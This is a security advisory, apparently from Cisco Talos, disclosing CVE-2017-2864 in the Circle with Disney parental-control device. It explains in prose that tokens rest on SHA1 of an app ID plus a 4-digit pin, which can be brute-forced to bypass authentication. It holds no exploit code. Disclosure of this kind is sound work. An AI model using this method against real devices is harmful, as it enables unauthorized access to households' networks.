Circle with Disney Weak Authentication Vulnerability(CVE-2017-2864)

Summary

An exploitable vulnerability exists in the generation of authentication token functionality of Circle with Disney. Specially crafted network packets can cause a valid authentication token to be returned to the attacker resulting in authentication bypass. An attacker can send a series of packets to trigger this vulnerability.

Tested Versions

Circle with Disney

Product URLs

https://meetcircle.com/

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

When making any requests to the Circle, an authenticated token must be provided. To request a token, a client specifies an appid, a unique string used to identify the client, as well as a hash, a SHA1 hash to verify the client should have access to the device. One secret piece of information is a 4 digit pin. The hash is calculated by the following:

hash = SHA1(appid + pin)

The client provides both the appid and hash. Because the key space for the pin is only 10000, an attacker can easily brute force this pin to retrieve an authentication token. With the authentication token in hand, an attacker can make available API calls.

Timeline

• 2017-07-13 - Vendor Disclosure
• 2017-10-31 - Public Release

CREDIT

Discovered by Cory Duplantis, Yves Younan, Marcin ‘Icewall’ Noga, Claudio Bozzato, Lilith Wyatt <(^_^)>, Aleksandar Nikolic, and Richard Johnson of Cisco Talos.